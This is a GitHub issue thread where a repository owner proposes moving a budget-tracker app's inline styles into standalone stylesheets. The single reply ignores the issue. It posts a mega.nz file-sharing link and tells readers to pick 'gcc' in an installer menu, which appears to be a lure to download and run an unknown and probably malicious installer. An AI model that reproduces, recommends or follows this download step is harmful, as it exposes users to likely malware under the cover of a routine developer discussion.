### ISSUE TITLE
Improve inline styling

### ISSUE THREAD

**Issue by nataliausoltseva** [nataliausoltseva/Budget-Tracker#83]
Most of the time i'd just write inline styling as it would be faster rather than making the code more better looking. Now it can be improved and moved into standalone styles

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
